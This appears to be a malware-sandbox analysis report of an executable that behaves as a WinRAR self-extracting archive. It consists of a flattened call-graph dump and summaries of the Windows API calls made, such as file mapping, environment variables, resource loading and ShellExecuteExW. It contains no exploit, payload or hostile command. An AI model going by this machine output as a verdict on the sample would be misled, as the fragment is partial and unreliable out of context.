calls 24864 b2885d 24858->24864 24859 b28a5f 24865 b28ab6 24859->24865 24877 b28a6a 24859->24877 24860 b28992 24860->24859 24867 b289e1 24860->24867 24861 b2898b 25149 b22021 74 API calls 24861->25149 24864->24854 24864->24858 24864->24860 24864->24861 25147 b28117 84 API calls 24864->25147 25148 b22021 74 API calls 24864->25148 24870 b28a4c 24865->24870 25152 b27fc0 97 API calls 24865->25152 24866 b28ab4 24871 b2959a 80 API calls 24866->24871 24868 b28b14 24867->24868 24867->24870 24872 b2a231 3 API calls 24867->24872 24886 b28b82 24868->24886 24916 b29105 24868->24916 25153 b298bc 24868->25153 24869 b2959a 80 API calls 24869->24854 24870->24866 24870->24868 24871->24854 24874 b28a19 24872->24874 24874->24870 25150 b292a3 97 API calls 24874->25150 24875 b2ab1a 8 API calls 24878 b28bd1 24875->24878 24877->24866 25151 b27db2 101 API calls 24877->25151 24881 b2ab1a 8 API calls 24878->24881 24898 b28be7 24881->24898 24884 b28b70 25157 b26e98 77 API calls 24884->25157 24886->24875 24887 b28cbc 24888 b28e40 24887->24888 24889 b28d18 24887->24889 24891 b28e52 24888->24891 24892 b28e66 24888->24892 24912 b28d49 24888->24912 24890 b28d8a 24889->24890 24893 b28d28 24889->24893 24900 b28167 19 API calls 24890->24900 24894 b29215 123 API calls 24891->24894 24895 b33377 75 API calls 24892->24895 24896 b28d6e 24893->24896 24904 b28d37 24893->24904 24894->24912 24897 b28e7f 24895->24897 24896->24912 25160 b277b8 111 API calls 24896->25160 25163 b33020 123 API calls 24897->25163 24898->24887 24899 b28c93 24898->24899 24907 b2981a 79 API calls 24898->24907 24899->24887 25158 b29a3c 82 API calls 24899->25158 24905 b28dbd 24900->24905 25159 b22021 74 API calls 24904->25159 24908 b28de6 24905->24908 24909 b28df5 24905->24909 24905->24912 24907->24899 25161 b27542 85 API calls 24908->25161 25162 b29155 93 API calls __EH_prolog 24909->25162 24914 b28f85 24912->24914 25164 b22021 74 API calls 24912->25164 24915 b29090 24914->24915 24914->24916 24917 b2903e 24914->24917 25138 b29f09 
SetEndOfFile 24914->25138 24915->24916 24918 b2a4ed 3 API calls 24915->24918 24916->24869 25139 b29da2 24917->25139 24919 b290eb 24918->24919 24919->24916 25165 b22021 74 API calls 24919->25165 24922 b29085 24923 b29620 77 API calls 24922->24923 24923->24915 24925 b290fb 25166 b26dcb 76 API calls 24925->25166 24928 b216a4 24927->24928 25182 b2cee1 24928->25182 24932 b29f59 24931->24932 24933 b29f63 24932->24933 25190 b26d0c 78 API calls 24932->25190 24933->24763 24935->24775 24937 b2b50f __EH_prolog 24936->24937 24942 b2f1d0 82 API calls 24937->24942 24939 b2b521 24943 b2b61e 24939->24943 24942->24939 24944 b2b630 __cftof 24943->24944 24947 b310dc 24944->24947 24950 b3109e GetCurrentProcess GetProcessAffinityMask 24947->24950 24951 b2b597 24950->24951 24951->24795 24957 b21732 24952->24957 24954 b213d6 24954->24813 24955->24804 24956->24810 24959 b21748 24957->24959 24969 b217a0 __InternalCxxFrameHandler 24957->24969 24958 b21771 24961 b217c7 24958->24961 24966 b2178d ___std_exception_copy 24958->24966 24959->24958 24970 b26c36 76 API calls __vswprintf_c_l 24959->24970 24963 b43e3e 22 API calls 24961->24963 24962 b21767 24971 b26ca7 75 API calls 24962->24971 24965 b217ce 24963->24965 24965->24969 24973 b26ca7 75 API calls 24965->24973 24966->24969 24972 b26ca7 75 API calls 24966->24972 24969->24954 24970->24962 24971->24958 24972->24969 24973->24969 24975 b2cf4d 24974->24975 24977 b2cf54 24974->24977 24976 b2981a 79 API calls 24975->24976 24976->24977 24977->24817 24978->24819 24980 b3de78 24979->24980 24981 b2e617 53 API calls 24980->24981 24982 b3de9b 24981->24982 24983 b24092 _swprintf 51 API calls 24982->24983 24984 b3dead 24983->24984 24985 b3d4d4 16 API calls 24984->24985 24986 b31b7c 24985->24986 24986->24772 24988 b219bf 24987->24988 24990 b219bb 24987->24990 24991 b218f6 24988->24991 24990->24826 24992 b21908 24991->24992 24993 b21945 24991->24993 24994 b23b2d 101 API calls 24992->24994 24999 b23fa3 24993->24999 24995 b21928 24994->24995 24995->24990 25003 
b23fac 24999->25003 25000 b23b2d 101 API calls 25000->25003 25001 b21966 25001->24995 25004 b21e50 25001->25004 25003->25000 25003->25001 25016 b30e08 25003->25016 25005 b21e5a __EH_prolog 25004->25005 25024 b23bba 25005->25024 25007 b21e84 25008 b21732 78 API calls 25007->25008 25010 b21f0b 25007->25010 25009 b21e9b 25008->25009 25052 b218a9 78 API calls 25009->25052 25010->24995 25012 b21eb3 25014 b21ebf _wcslen 25012->25014 25053 b31b84 MultiByteToWideChar 25012->25053 25054 b218a9 78 API calls 25014->25054 25017 b30e0f 25016->25017 25018 b30e2a 25017->25018 25022 b26c31 RaiseException CallUnexpected 25017->25022 25020 b30e3b SetThreadExecutionState 25018->25020 25023 b26c31 RaiseException CallUnexpected 25018->25023 25020->25003 25022->25018 25023->25020 25025 b23bc4 __EH_prolog 25024->25025 25026 b23bf6 25025->25026 25027 b23bda 25025->25027 25029 b23e51 25026->25029 25032 b23c22 25026->25032 25080 b2138b 74 API calls 25027->25080 25097 b2138b 74 API calls 25029->25097 25031 b23be5 25031->25007 25032->25031 25055 b33377 25032->25055 25034 b23ca3 25035 b23d2e 25034->25035 25051 b23c9a 25034->25051 25083 b2d051 25034->25083 25065 b2ab1a 25035->25065 25036 b23c9f 25036->25034 25082 b220bd 78 API calls 25036->25082 25038 b23c71 25038->25034 25038->25036 25039 b23c8f 25038->25039 25081 b2138b 74 API calls 25039->25081 25043 b23d41 25045 b23dd7 25043->25045 25046 b23dc7 25043->25046 25089 b33020 123 API calls 25045->25089 25069 b29215 25046->25069 25049 b23dd5 25049->25051 25090 b22021 74 API calls 25049->25090 25091 b32297 25051->25091 25052->25012 25053->25014 25054->25010 25056 b3338c 25055->25056 25058 b33396 ___std_exception_copy 25055->25058 25098 b26ca7 75 API calls 25056->25098 25059 b3341c 25058->25059 25060 b334c6 25058->25060 25063 b33440 __cftof 25058->25063 25099 b332aa 75 API calls 3 library calls 25059->25099 25100 b4238d RaiseException 25060->25100 25063->25038 25064 b334f2 25066 b2ab28 25065->25066 25068 b2ab32 25065->25068 25067 b3eb38 8 API calls 
25066->25067 25067->25068 25068->25043 25070 b2921f __EH_prolog 25069->25070 25101 b27c64 25070->25101 25073 b213ba 78 API calls 25074 b29231 25073->25074 25104 b2d114 25074->25104 25076 b29243 25077 b2928a 25076->25077 25079 b2d114 118 API calls 25076->25079 25113 b2d300 97 API calls __InternalCxxFrameHandler 25076->25113 25077->25049 25079->25076 25080->25031 25081->25051 25082->25034 25084 b2d072 25083->25084 25085 b2d084 25083->25085 25114 b2603a 82 API calls 25084->25114 25115 b2603a 82 API calls 25085->25115 25088 b2d07c 25088->25035 25089->25049 25090->25051 25093 b322a1 25091->25093 25092 b322ba 25116 b30eed 86 API calls 25092->25116 25093->25092 25096 b322ce 25093->25096 25095 b322c1 25095->25096 25097->25031 25098->25058 25099->25063 25100->25064 25102 b2b146 GetVersionExW 25101->25102 25103 b27c69 25102->25103 25103->25073 25111 b2d12a __InternalCxxFrameHandler 25104->25111 25105 b2d29a 25106 b2d0cb 6 API calls 25105->25106 25107 b2d2ce 25105->25107 25106->25107 25108 b30e08 SetThreadExecutionState RaiseException 25107->25108 25110 b2d291 25108->25110 25109 b38c8d 103 API calls 25109->25111 25110->25076 25111->25105 25111->25109 25111->25110 25112 b2ac05 91 API calls 25111->25112 25112->25111 25113->25076 25114->25088 25115->25088 25116->25095 25117->24836 25118->24836 25119->24833 25121 b25d2a 25120->25121 25167 b25c4b 25121->25167 25123 b25d5d 25125 b25d95 25123->25125 25172 b2b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25123->25172 25125->24850 25127 b28186 25126->25127 25128 b28232 25127->25128 25179 b2be5e 19 API calls __InternalCxxFrameHandler 25127->25179 25178 b31fac CharUpperW 25128->25178 25131 b2823b 25131->24853 25133 b27c22 25132->25133 25134 b27c5a 25133->25134 25180 b26e7a 74 API calls 25133->25180 25134->24864 25136 b27c52 25181 b2138b 74 API calls 25136->25181 25138->24917 25140 b29db3 25139->25140 25142 b29dc2 25139->25142 25141 b29db9 FlushFileBuffers 25140->25141 25140->25142 25141->25142 25143 b29e3f SetFileTime 
25142->25143 25143->24922 25144->24843 25145->24854 25146->24854 25147->24864 25148->24864 25149->24860 25150->24870 25151->24866 25152->24870 25154 b28b5a 25153->25154 25155 b298c5 GetFileType 25153->25155 25154->24886 25156 b22021 74 API calls 25154->25156 25155->25154 25156->24884 25157->24886 25158->24887 25159->24912 25160->24912 25161->24912 25162->24912 25163->24912 25164->24914 25165->24925 25166->24916 25173 b25b48 25167->25173 25170 b25b48 2 API calls 25171 b25c6c 25170->25171 25171->25123 25172->25123 25176 b25b52 25173->25176 25174 b25c3a 25174->25170 25174->25171 25176->25174 25177 b2b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25176->25177 25177->25176 25178->25131 25179->25128 25180->25136 25181->25134 25183 b2cef2 25182->25183 25188 b2a99e 86 API calls 25183->25188 25185 b2cf24 25189 b2a99e 86 API calls 25185->25189 25187 b2cf2f 25188->25185 25189->25187 25190->24933 25192 b2a6a8 25191->25192 25193 b2a6c1 FindFirstFileW 25192->25193 25194 b2a727 FindNextFileW 25192->25194 25195 b2a6d0 25193->25195 25201 b2a709 25193->25201 25196 b2a732 GetLastError 25194->25196 25194->25201 25197 b2bb03 GetCurrentDirectoryW 25195->25197 25196->25201 25198 b2a6e0 25197->25198 25199 b2a6e4 FindFirstFileW 25198->25199 25200 b2a6fe GetLastError 25198->25200 25199->25200 25199->25201 25200->25201 25201->24785 25202->24591 25203->24595 25204->24595 25205->24598 25206->24606 25208 b29f42 78 API calls 25207->25208 25209 b21fe8 25208->25209 25210 b21a04 101 API calls 25209->25210 25213 b22005 25209->25213 25211 b21ff5 25210->25211 25211->25213 25214 b2138b 74 API calls 25211->25214 25213->24614 25213->24615 25214->25213 25216 b3b583 GetMessageW 25215->25216 25217 b3b5bc GetDlgItem 25215->25217 25218 b3b599 IsDialogMessageW 25216->25218 25219 b3b5a8 TranslateMessage DispatchMessageW 25216->25219 25217->24625 25217->24626 25218->25217 25218->25219 25219->25217 25220 b213e1 84 API calls 2 library calls 25345 b394e0 GetClientRect 25378 b321e0 26 API calls 
std::bad_exception::bad_exception 25396 b3f2e0 46 API calls __RTC_Initialize 25221 b3eae7 25222 b3eaf1 25221->25222 25223 b3e85d ___delayLoadHelper2@8 14 API calls 25222->25223 25224 b3eafe 25223->25224 25346 b3f4e7 29 API calls _abort 25397 b4bee0 GetCommandLineA GetCommandLineW 25379 b2f1e8 FreeLibrary 25347 b3f4d3 20 API calls 25232 b3e1d1 14 API calls ___delayLoadHelper2@8 25234 b3e2d7 25235 b3e1db 25234->25235 25236 b3e85d ___delayLoadHelper2@8 14 API calls 25235->25236 25236->25235 25416 b4a3d0 21 API calls 2 library calls 25417 b52bd0 VariantClear 25239 b210d5 25244 b25abd 25239->25244 25245 b25ac7 __EH_prolog 25244->25245 25246 b2b505 84 API calls 25245->25246 25247 b25ad3 25246->25247 25251 b25cac GetCurrentProcess GetProcessAffinityMask 25247->25251 25399 b40ada 51 API calls 2 library calls 25316 b3dec2 25317 b3decf 25316->25317 25318 b2e617 53 API calls 25317->25318 25319 b3dedc 25318->25319 25320 b24092 _swprintf 51 API calls 25319->25320 25321 b3def1 SetDlgItemTextW 25320->25321 25322 b3b568 5 API calls 25321->25322 25323 b3df0e 25322->25323 25381 b3b5c0 100 API calls 25418 b377c0 118 API calls 25419 b3ffc0 RaiseException _com_error::_com_error CallUnexpected 25400 b362ca 123 API calls __InternalCxxFrameHandler 25382 b3f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25421 b3ff30 LocalFree 24141 b4bb30 24142 b4bb39 24141->24142 24143 b4bb42 24141->24143 24145 b4ba27 24142->24145 24146 b497e5 _abort 38 API calls 24145->24146 24147 b4ba34 24146->24147 24165 b4bb4e 24147->24165 24149 b4ba3c 24174 b4b7bb 24149->24174 24154 b4ba96 24157 b48dcc _free 20 API calls 24154->24157 24159 b4ba53 24157->24159 24158 b4ba91 24198 b491a8 20 API calls __dosmaperr 24158->24198 24159->24143 24161 b4bada 24161->24154 24199 b4b691 26 API calls 24161->24199 24162 b4baae 24162->24161 24163 b48dcc _free 20 API calls 24162->24163 24163->24161 24166 b4bb5a ___scrt_is_nonwritable_in_current_image 24165->24166 
24167 b497e5 _abort 38 API calls 24166->24167 24172 b4bb64 24167->24172 24169 b4bbe8 _abort 24169->24149 24172->24169 24173 b48dcc _free 20 API calls 24172->24173 24200 b48d24 38 API calls _abort 24172->24200 24201 b4ac31 EnterCriticalSection 24172->24201 24202 b4bbdf LeaveCriticalSection _abort 24172->24202 24173->24172 24175 b44636 __cftof 38 API calls 24174->24175 24176 b4b7cd 24175->24176 24177 b4b7dc GetOEMCP 24176->24177 24178 b4b7ee 24176->24178 24179 b4b805 24177->24179 24178->24179 24180 b4b7f3 GetACP 24178->24180 24179->24159 24181 b48e06 24179->24181 24180->24179 24182 b48e44 24181->24182 24186 b48e14 _abort 24181->24186 24204 b491a8 20 API calls __dosmaperr 24182->24204 24183 b48e2f RtlAllocateHeap 24185 b48e42 24183->24185 24183->24186 24185->24154 24188 b4bbf0 24185->24188 24186->24182 24186->24183 24203 b47a5e 7 API calls 2 library calls 24186->24203 24189 b4b7bb 40 API calls 24188->24189 24190 b4bc0f 24189->24190 24193 b4bc60 IsValidCodePage 24190->24193 24195 b4bc16 24190->24195 24196 b4bc85 __cftof 24190->24196 24191 b3fbbc _ValidateLocalCookies 5 API calls 24192 b4ba89 24191->24192 24192->24158 24192->24162 24194 b4bc72 GetCPInfo 24193->24194 24193->24195 24194->24195 24194->24196 24195->24191 24205 b4b893 GetCPInfo 24196->24205 24198->24154 24199->24154 24201->24172 24202->24172 24203->24186 24204->24185 24211 b4b8cd 24205->24211 24214 b4b977 24205->24214 24207 b3fbbc _ValidateLocalCookies 5 API calls 24210 b4ba23 24207->24210 24210->24195 24215 b4c988 24211->24215 24213 b4ab78 __vsnwprintf_l 43 API calls 24213->24214 24214->24207 24216 b44636 __cftof 38 API calls 24215->24216 24217 b4c9a8 MultiByteToWideChar 24216->24217 24219 b4c9e6 24217->24219 24220 b4ca7e 24217->24220 24224 b48e06 __vsnwprintf_l 21 API calls 24219->24224 24225 b4ca07 __cftof __vsnwprintf_l 24219->24225 24221 b3fbbc _ValidateLocalCookies 5 API calls 24220->24221 24222 b4b92e 24221->24222 24229 b4ab78 24222->24229 24223 b4ca78 24234 b4abc3 20 API calls _free 24223->24234 
24224->24225 24225->24223 24227 b4ca4c MultiByteToWideChar 24225->24227 24227->24223 24228 b4ca68 GetStringTypeW 24227->24228 24228->24223 24230 b44636 __cftof 38 API calls 24229->24230 24231 b4ab8b 24230->24231 24235 b4a95b 24231->24235 24234->24220 24236 b4a976 __vsnwprintf_l 24235->24236 24237 b4a99c MultiByteToWideChar 24236->24237 24238 b4a9c6 24237->24238 24239 b4ab50 24237->24239 24242 b48e06 __vsnwprintf_l 21 API calls 24238->24242 24244 b4a9e7 __vsnwprintf_l 24238->24244 24240 b3fbbc _ValidateLocalCookies 5 API calls 24239->24240 24241 b4ab63 24240->24241 24241->24213 24242->24244 24243 b4aa30 MultiByteToWideChar 24245 b4aa49 24243->24245 24258 b4aa9c 24243->24258 24244->24243 24244->24258 24262 b4af6c 24245->24262 24249 b4aaab 24251 b4aacc __vsnwprintf_l 24249->24251 24252 b48e06 __vsnwprintf_l 21 API calls 24249->24252 24250 b4aa73 24254 b4af6c __vsnwprintf_l 11 API calls 24250->24254 24250->24258 24253 b4ab41 24251->24253 24255 b4af6c __vsnwprintf_l 11 API calls 24251->24255 24252->24251 24270 b4abc3 20 API calls _free 24253->24270 24254->24258 24257 b4ab20 24255->24257 24257->24253 24259 b4ab2f WideCharToMultiByte 24257->24259 24271 b4abc3 20 API calls _free 24258->24271 24259->24253 24260 b4ab6f 24259->24260 24272 b4abc3 20 API calls _free 24260->24272 24263 b4ac98 _abort 5 API calls 24262->24263 24264 b4af93 24263->24264 24267 b4af9c 24264->24267 24273 b4aff4 10 API calls 3 library calls 24264->24273 24266 b4afdc LCMapStringW 24266->24267 24268 b3fbbc _ValidateLocalCookies 5 API calls 24267->24268 24269 b4aa60 24268->24269 24269->24249 24269->24250 24269->24258 24270->24258 24271->24239 24272->24258 24273->24266 25350 b4c030 GetProcessHeap 25402 b3c220 93 API calls _swprintf 25352 b4f421 21 API calls __vsnwprintf_l 25383 b4b4ae 27 API calls _ValidateLocalCookies 25353 b21025 29 API calls 25424 b21710 86 API calls 25384 b3ad10 73 API calls 25357 b3a400 GdipDisposeImage GdipFree 25403 b3d600 70 API calls 25358 b46000 QueryPerformanceFrequency 
QueryPerformanceCounter 25387 b42900 6 API calls 4 library calls 25404 b4f200 51 API calls 25426 b4a700 21 API calls 25427 b21f72 128 API calls __EH_prolog 25360 b3a070 10 API calls 25405 b3b270 99 API calls 24323 b29a74 24326 b29a7e 24323->24326 24324 b29b9d SetFilePointer 24325 b29bb6 GetLastError 24324->24325 24329 b29ab1 24324->24329 24325->24329 24326->24324 24328 b29b79 24326->24328 24326->24329 24330 b2981a 24326->24330 24328->24324 24331 b29833 24330->24331 24333 b29e80 79 API calls 24331->24333 24332 b29865 24332->24328 24333->24332 25362 b21075 84 API calls 24334 b29f7a 24335 b29f8f 24334->24335 24340 b29f88 24334->24340 24336 b29f9c GetStdHandle 24335->24336 24341 b29fab 24335->24341 24336->24341 24337 b2a003 WriteFile 24337->24341 24338 b29fd4 WriteFile 24339 b29fcf 24338->24339 24338->24341 24339->24338 24339->24341 24341->24337 24341->24338 24341->24339 24341->24340 24343 b2a095 24341->24343 24345 b26baa 78 API calls 24341->24345 24346 b26e98 77 API calls 24343->24346 24345->24341 24346->24340 25364 b3c793 107 API calls 4 library calls 25429 b47f6e 52 API calls 2 library calls 25406 b48268 55 API calls _free 25237 b4c051 31 API calls _ValidateLocalCookies 25365 b3e455 14 API calls ___delayLoadHelper2@8 25252 b3cd58 25254 b3ce22 25252->25254 25259 b3cd7b 25252->25259 25253 b3b314 ExpandEnvironmentStringsW 25264 b3c793 _wcslen _wcsrchr 25253->25264 25254->25264 25280 b3d78f 25254->25280 25256 b3d40a 25258 b31fbb CompareStringW 25258->25259 25259->25254 25259->25258 25260 b3ca67 SetWindowTextW 25260->25264 25263 b43e3e 22 API calls 25263->25264 25264->25253 25264->25256 25264->25260 25264->25263 25266 b3c855 SetFileAttributesW 25264->25266 25271 b3cc31 GetDlgItem SetWindowTextW SendMessageW 25264->25271 25274 b3cc71 SendMessageW 25264->25274 25279 b31fbb CompareStringW 25264->25279 25304 b3a64d GetCurrentDirectoryW 25264->25304 25306 b2a5d1 6 API calls 25264->25306 25307 b2a55a FindClose 25264->25307 25308 b3b48e 76 API calls 2 library calls 25264->25308 
25267 b3c90f GetFileAttributesW 25266->25267 25278 b3c86f __cftof _wcslen 25266->25278 25267->25264 25269 b3c921 DeleteFileW 25267->25269 25269->25264 25272 b3c932 25269->25272 25271->25264 25273 b24092 _swprintf 51 API calls 25272->25273 25275 b3c952 GetFileAttributesW 25273->25275 25274->25264 25275->25272 25276 b3c967 MoveFileW 25275->25276 25276->25264 25277 b3c97f MoveFileExW 25276->25277 25277->25264 25278->25264 25278->25267 25305 b2b991 51 API calls 2 library calls 25278->25305 25279->25264 25281 b3d799 __cftof _wcslen 25280->25281 25282 b3d8a5 25281->25282 25283 b3d9c0 25281->25283 25284 b3d9e7 25281->25284 25309 b31fbb CompareStringW 25281->25309 25286 b2a231 3 API calls 25282->25286 25283->25284 25287 b3d9de ShowWindow 25283->25287 25284->25264 25288 b3d8ba 25286->25288 25287->25284 25289 b3d8d9 ShellExecuteExW 25288->25289 25310 b2b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25288->25310 25289->25284 25296 b3d8ec 25289->25296 25291 b3d8d1 25291->25289 25292 b3d925 25311 b3dc3b 6 API calls 25292->25311 25293 b3d97b CloseHandle 25294 b3d989 25293->25294 25295 b3d994 25293->25295 25312 b31fbb CompareStringW 25294->25312 25295->25283 25296->25292 25296->25293 25298 b3d91b ShowWindow 25296->25298 25298->25292 25300 b3d93d 25300->25293 25301 b3d950 GetExitCodeProcess 25300->25301 25301->25293 25302 b3d963 25301->25302 25302->25293 25304->25264 25305->25278 25306->25264 25307->25264 25308->25264 25309->25282 25310->25291 25311->25300 25312->25295 25366 b3a440 GdipCloneImage GdipAlloc 25408 b43a40 5 API calls _ValidateLocalCookies 25430 b51f40 CloseHandle

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B30863: GetModuleHandleW.KERNEL32(kernel32), ref: 00B3087C
                                                                                                                                                                            • Part of subcall function 00B30863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B3088E
                                                                                                                                                                            • Part of subcall function 00B30863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B308BF
                                                                                                                                                                            • Part of subcall function 00B3A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B3A655
                                                                                                                                                                            • Part of subcall function 00B3AC16: OleInitialize.OLE32(00000000), ref: 00B3AC2F
                                                                                                                                                                            • Part of subcall function 00B3AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B3AC66
                                                                                                                                                                            • Part of subcall function 00B3AC16: SHGetMalloc.SHELL32(00B68438), ref: 00B3AC70
                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 00B3DF5C
                                                                                                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B3DF83
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B3DF94
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00B3DFCE
                                                                                                                                                                            • Part of subcall function 00B3DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B3DBF4
                                                                                                                                                                            • Part of subcall function 00B3DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B3DC30
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B3DFD7
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00B7EC90,00000800), ref: 00B3DFF2
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,00B7EC90), ref: 00B3DFFE
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00B3E009
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3E048
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B3E05A
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00B3E061
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000064), ref: 00B3E078
                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00B3E0C9
                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 00B3E0F7
                                                                                                                                                                          • DeleteObject.GDI32 ref: 00B3E130
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00B3E140
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00B3E183
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                          • API String ID: 3049964643-3743209390

                                                                                                                                                                          [Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B3B73D,00000066), ref: 00B3A6D5
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A6EC
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A703
                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A712
                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B3B73D,00000066), ref: 00B3A72D
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00B3A73E
                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B3A762
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00B3A7C6
                                                                                                                                                                            • Part of subcall function 00B3A626: GdipAlloc.GDIPLUS(00000010), ref: 00B3A62C
                                                                                                                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B3A7A7
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00B3A7CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                          • String ID: PNG
                                                                                                                                                                          • API String ID: 211097158-364855578

                                                                                                                                                                          [Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6C4
                                                                                                                                                                            • Part of subcall function 00B2BB03: _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6F2
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6FE
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A728
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A734
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 42610566-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00B47DC4,00000000,00B5C300,0000000C,00B47F1B,00000000,00000002,00000000), ref: 00B47E0F
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00B47DC4,00000000,00B5C300,0000000C,00B47F1B,00000000,00000002,00000000), ref: 00B47E16
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00B47E28
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          APIs
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B3B7E5
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3B8D1
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B8EF
                                                                                                                                                                          • IsDialogMessageW.USER32(?,?), ref: 00B3B902
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00B3B910
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00B3B91A
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B3B93D
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B3B960
                                                                                                                                                                          • GetDlgItem.USER32(?,00000068), ref: 00B3B983
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B3B99E
